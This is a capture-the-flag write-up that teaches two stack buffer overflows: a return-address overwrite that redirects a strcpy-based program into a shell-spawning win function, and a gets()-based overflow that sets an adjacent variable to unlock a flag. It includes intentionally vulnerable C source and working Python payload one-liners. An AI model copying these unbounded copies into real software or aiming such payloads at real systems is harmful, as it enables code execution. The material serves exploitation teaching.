Simple Buffer Overflow (no protection: no stack canary, non-PIE binary) - Overwriting the return address to call a function
# Code
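#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

/* Size of the stack buffer the challenge overflows.  Deliberately too small
 * for an arbitrary argv[1]: this IS the CTF target, not a bug to fix. */
#define ORDRE_LEN 50

/* Forward declarations.  Both functions are defined after main() and were
 * previously called without a prototype (implicit declaration, removed in
 * C99).  Their definition order is kept so the binary's layout, and hence
 * the address used by the exploit, is unchanged. */
void earth_destroy(void);
void earth_alive(void);

/* Banner printed on every run, with or without an argument. */
static const char BANNER[] =
    "Bienvenue, humain. Donnez-nous vos ordres. En cas de bonne réponse, nous vous épargnerons. Le cas échéant, nous détruirons la terre.\n";

/*
 * Copy the caller-supplied "order" into a fixed 50-byte stack buffer and echo it.
 *
 * INTENTIONALLY VULNERABLE: strcpy() performs no bounds check, so an argument
 * longer than ORDRE_LEN-1 bytes overwrites whatever sits above `ordre` on the
 * stack (alignment padding, saved EBP, then the saved return address).  The
 * exploit in this writeup relies on exactly that.  The safe form would be
 * snprintf(ordre, sizeof ordre, "%s", arg).
 *
 * arg: NUL-terminated string; must not be NULL (strcpy on NULL is UB).
 */
void copy_ordre(char *arg)
{
    char ordre[ORDRE_LEN];

    strcpy(ordre, arg);                      /* unbounded copy: the bug */
    printf("\nOrdre reçu : %s\n\n", ordre);
}

/*
 * Entry point.  Prints the banner, then with no argument prints usage and
 * exits 0; otherwise hands argv[1] to copy_ordre() and, on the normal path,
 * runs earth_destroy().  Nothing in the program calls earth_alive(): it is
 * reachable only by corrupting copy_ordre()'s saved return address.
 */
int main(int argc, char **argv)
{
    printf("%s", BANNER);

    if (argc < 2) {
        /* argv[0] can be NULL when argc == 0; never feed NULL to %s. */
        const char *prog = (argc > 0 && argv[0] != NULL) ? argv[0] : "pwn1";
        printf("Usage: %s <ordre>\n", prog);
        exit(0);
    }

    copy_ordre(argv[1]);
    earth_destroy();
    return 0;
}

/* Normal outcome once copy_ordre() returns cleanly. */
void earth_destroy(void)
{
    printf("Mauvaise réponse ! Nous détruirons votre planète dans quelques minutes.\n");
}

/* Win function and the exploit's target; unreachable by normal control flow.
 * execve() replaces the process image, so stdout is flushed first or the
 * message is lost when output is a pipe.  An explicit argv is passed because
 * POSIX requires a non-NULL argv (Linux tolerates NULL, other systems may not). */
void earth_alive(void)
{
    char *const sh_argv[] = { "/bin/sh", NULL };

    printf("Nous nous avouons vaincu. Vous avez gagné, nous vous rendons la terre !\n");
    fflush(stdout);
    execve("/bin/sh", sh_argv, NULL);
    /* Only reached if execve() failed. */
    perror("execve");
    _exit(127);
}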
# Explanations and Exploit
# The goal is to redirect execution into earth_alive(), which is never called by the program's normal control flow.
# The buffer `ordre` is 50 bytes long and strcpy() does no bounds check, so an argument longer than 50 characters overwrites whatever lies above the buffer on the stack.
# Between the end of the buffer and the saved return address (the value loaded into EIP when copy_ordre() returns) sit the compiler's alignment padding and the saved EBP; in this build that is 12 bytes, so the return address starts 62 bytes into the input. The function's argument lives above the return address, not between the buffer and it, so it does not contribute to the offset.
# The offset is specific to this compiled binary — confirm it with a cyclic pattern or in gdb rather than reusing 62 blindly.
# The payload is the address of the function to return into, written as raw little-endian bytes. This works because the binary has no stack canary and is not position-independent (nm prints a fixed absolute address, so no leak is needed).
# Resolve the address of the win function from the symbol table ('T' = defined
# in the text/code section).  The value is usable as a hard-coded return
# address only because the binary appears to be non-PIE (nm prints a fixed
# 0x0804xxxx load address); with PIE/ASLR it would have to be leaked at runtime.
$ nm ./pwn1 | grep "earth_alive"
08048acb T earth_alive
# So, the payload will be the following
# 62 bytes of filler reach the saved return address, which is then replaced by
# earth_alive: 0x08048acb packed little-endian as cb 8a 04 08.  This only works
# via argv because the address contains no 0x00 byte (argv strings are
# NUL-terminated); $(...) strips the trailing newline that print emits.
# Python 2 is assumed: under Python 3, print(...) emits a str and "\xcb" is
# UTF-8-encoded to two bytes, corrupting the address.  Python 3 equivalent:
#   ./pwn1 "$(python3 -c 'import sys; sys.stdout.buffer.write(b"A"*62 + b"\xcb\x8a\x04\x08")')"
./pwn1 $(python -c 'print "A"*62 + "\xcb\x8a\x04\x08"')
Simple BoF - Integer overwrite (overflow into an adjacent local variable)
# Code
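#include <stdio.h>

/* gets() is no longer declared by <stdio.h> under -std=c11 but still exists
 * in libc; declare it explicitly to avoid an implicit declaration.  It is the
 * intended vulnerability of this challenge — do NOT swap it for fgets() if the
 * binary is meant to stay exploitable. */
char *gets(char *s);

enum {
    BUF_LEN   = 20,     /* size of the overflowable buffer */
    FLAG_LEN  = 64,     /* max flag line length read from flag.txt */
    WIN_VALUE = 1234    /* value x must hold to print the flag */
};

/*
 * Read one line into a 20-byte stack buffer with gets() and print the flag if
 * the adjacent local `x` ends up equal to 1234.
 *
 * INTENTIONALLY VULNERABLE: gets() has no length limit, so a line longer than
 * the buffer overwrites the bytes above it — in this build, 4 bytes of padding
 * and then `x`.  Nothing in the program assigns x after its initialiser, so
 * the only way to reach the flag is the overflow.
 *
 * NOTE(review): because the overflow is undefined behaviour, an optimising
 * compiler may fold `x == 1234` to false; the challenge presumably needs to be
 * built with -O0 (and without a stack protector) — confirm the build flags.
 */
int main(void)
{
    char buf[BUF_LEN];
    int x = 0;

    gets(buf);                               /* unbounded read: the bug */

    if (x == WIN_VALUE) {
        /* Kept from the original listing; presumably enabled in the deployed
         * binary so the flag is readable by the setgid group — unverified. */
        // gid_t gid = getegid();
        // setresgid(gid, gid, gid);
        FILE *fp = fopen("flag.txt", "r");
        char flag[FLAG_LEN];

        if (fp == NULL) {
            /* Previously fgets() ran on a NULL stream and crashed. */
            perror("flag.txt");
        } else {
            if (fgets(flag, sizeof flag, fp) != NULL) {
                printf("Oh, un flag : %s\n", flag);
            } else {
                /* Empty/unreadable file: `flag` is uninitialised, don't print it. */
                fputs("flag.txt is empty or unreadable\n", stderr);
            }
            fclose(fp);
        }
    }
    printf("x value : %d\n", x);
    return 0;
}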
# Exploitation and Explanations
# The goal is to overwrite the local variable x (initialised to 0) with 1234: gets() reads an unbounded line into the 20-byte buf.
# In this build the stack layout is 20 bytes for buf, then 4 more bytes before x. The original writeup attributes those 4 bytes to "a pointer for this buffer", but buf is an array with no separate pointer — they are most likely frame alignment padding inserted by the compiler.
# Either way, 24 bytes of filler reach x and the following bytes overwrite it. The layout is compiler- and flag-dependent, so verify it in gdb before relying on 24.
# gets() is what makes this possible: it stops only at a newline (or EOF), never at a size limit, and passes NUL bytes through to the buffer.
# All three variants set x = 1234 (0x4d2).  24 bytes of filler reach x, and
# gets() then copies the remaining bytes over it; unlike an argv-based
# overflow, embedded NUL bytes are delivered because gets() only stops at the
# newline.  Python 2 is assumed (under Python 3 the "\xd2" would be
# UTF-8-encoded to two bytes); the trailing newline from print terminates gets().
# Variant 1: full 4-byte little-endian value d2 04 00 00.
$ python -c 'print "a"*24 + "\xd2\x04\x00\x00"'| ./pwn0
# Variant 2: only the low 2 bytes.  The upper bytes of x stay 0: x was
# initialised to 0 and gets() writes its NUL terminator into byte 2.
$ python -c 'print "a"*24 + "\xd2\x04"'| ./pwn0
# Variant 3: the last two filler bytes (the padding before x) replaced by
# NULs, then the same 2-byte value — same result as variant 2.
$ python -c 'print "a"*22 + "\x00\x00\xd2\x04"'| ./pwn0